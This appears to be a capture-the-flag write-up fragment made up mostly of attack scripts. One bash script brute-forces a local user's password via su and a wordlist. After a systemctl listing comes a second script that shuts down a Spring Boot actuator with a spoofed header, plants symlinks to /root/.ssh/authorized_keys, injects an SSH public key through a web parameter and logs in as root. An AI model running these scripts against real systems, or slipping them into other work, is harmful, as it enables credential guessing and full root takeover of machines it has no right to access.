set -m #enable job control export TOP_PID=$$ #get the current PID trap "trap - SIGTERM && kill -- -$$" INT SIGINT SIGTERM EXIT #exit on trap
# https://github.com/fearside/ProgressBar/blob/master/progressbar.sh # something to look at while waiting function progressbar { let _progress=(${1}*100/${2}*100)/100 let _done=(${_progress}*4)/10 let _left=40-$_done
function brute() { keyword=$1 #get the word password="PrettyS3cure${keyword}Password123." #add it to our format output=$( ( sleep 0.2s && echo $password ) | script -qc 'su johnsmith -c "id"' /dev/null) # check the password if [[ $output != *"Authentication failure"* ]]; then #if password was correct printf "\rCreds Found! johnsmith:$password\n$output\nbye..." #print the password kill -9 -$(ps -o pgid= $TOP_PID | grep -o '[0-9]*') #kill parent and other jobs fi }
wordlist=$1 #get wordlist as parameter
count=$(wc -l $wordlist| grep -o '[0-9]*') #count how many words we have current=1
while IFS= read -r line #for each line do brute $line & #try the password progressbar ${current} ${count} #update progress bar. TODO:calculate ETA current=$(( current + 1 )) #increment done < $wordlist #read the wordlist
cat /tmp/result UNIT LOAD ACTIVE SUB DESCRIPTION accounts-daemon.service loaded active running Accounts Service apparmor.service loaded active exited AppArmor initialization apport.service loaded active exited LSB: automatic crash report generation atd.service loaded active running Deferred execution scheduler blk-availability.service loaded active exited Availability of block devices cloud-config.service loaded active exited Apply the settings specified in cloud-config cloud-final.service loaded active exited Execute cloud user/final scripts cloud-init-local.service loaded active exited Initial cloud-init job (pre-networking) cloud-init.service loaded active exited Initial cloud-init job (metadata service crawler) console-setup.service loaded active exited Set console font and keymap cron.service loaded active running Regular background program processing daemon dbus.service loaded active running D-Bus System Message Bus ebtables.service loaded active exited ebtables ruleset management getty@tty1.service loaded active running Getty on tty1 grub-common.service loaded active exited LSB: Record successful boot for GRUB keyboard-setup.service loaded active exited Set the console keyboard layout kmod-static-nodes.service loaded active exited Create list of required static device nodes for the current kernel lvm2-lvmetad.service loaded active running LVM2 metadata daemon lvm2-monitor.service loaded active exited Monitoring of LVM2 mirrors, snapshots etc. using dmeventd or progress polling lxcfs.service loaded active running FUSE filesystem for LXC lxd-containers.service loaded active exited LXD - container startup/shutdown networkd-dispatcher.service loaded active running Dispatcher daemon for systemd-networkd polkit.service loaded active running Authorization Manager rsyslog.service loaded active running System Logging Service serial-getty@ttyS0.service loaded active running Serial Getty on ttyS0 setvtrgb.service loaded active exited Set console scheme snapd.seeded.service loaded active exited Wait until snapd is fully seeded snapd.service loaded active running Snappy daemon spring.service loaded active running Spring Boot Application ssh.service loaded active running OpenBSD Secure Shell server systemd-journal-flush.service loaded active exited Flush Journal to Persistent Storage systemd-journald.service loaded active running Journal Service systemd-logind.service loaded active running Login Service systemd-modules-load.service loaded active exited Load Kernel Modules systemd-networkd-wait-online.service loaded active exited Wait for Network to be Configured systemd-networkd.service loaded active running Network Service systemd-random-seed.service loaded active exited Load/Save Random Seed systemd-remount-fs.service loaded active exited Remount Root and Kernel File Systems systemd-resolved.service loaded active running Network Name Resolution systemd-sysctl.service loaded active exited Apply Kernel Variables systemd-timesyncd.service loaded active running Network Time Synchronization systemd-tmpfiles-setup-dev.service loaded active exited Create Static Device Nodes in /dev systemd-tmpfiles-setup.service loaded active exited Create Volatile Files and Directories systemd-udev-trigger.service loaded active exited udev Coldplug all Devices systemd-udevd.service loaded active running udev Kernel Device Manager systemd-update-utmp.service loaded active exited Update UTMP about System Boot/Shutdown systemd-user-sessions.service loaded active exited Permit User Sessions ufw.service loaded active exited Uncomplicated firewall unattended-upgrades.service loaded active running Unattended Upgrades Shutdown user@1000.service loaded active running User Manager for UID 1000 user@65534.service loaded active running User Manager for UID 65534
LOAD = Reflects whether the unit definition was properly loaded. ACTIVE = The high-level unit activation state, i.e. generalization of SUB. SUB = The low-level unit activation state, values depend on unit type.
51 loaded units listed. Pass --all to see loaded but inactive units, too. To show all installed unit files use 'systemctl list-unit-files'.
#generate ssh key if it does not exists [ -f ./key ] && true || ssh-keygen -b 2048 -t ed25519 -f ./key -q -N "" #read public key pubkey=$(cat ./key.pub)
#send a shutdown request to the spring boot server curl -X POST https://localhost/actuator/shutdown -H 'x-9ad42dea0356cb04: 172.16.0.21' -k
#get date as epoch format d=$(date '+%s')
#let's assume 30 seconds is enough to restart the service for i in {1..30} do #create symlinks to /root/.ssh/authorized_keys for 30 seconds let time=$(( d + i )) ln -s /root/.ssh/authorized_keys "$time.log" done
#wait for app to restart sleep 30s
#send publickey as name to the greating server curl --data-urlencode "name=$pubkey" https://localhost/ -k sleep 5s
#connect as root ssh -o "StrictHostKeyChecking=no" -i ./key root@localhost
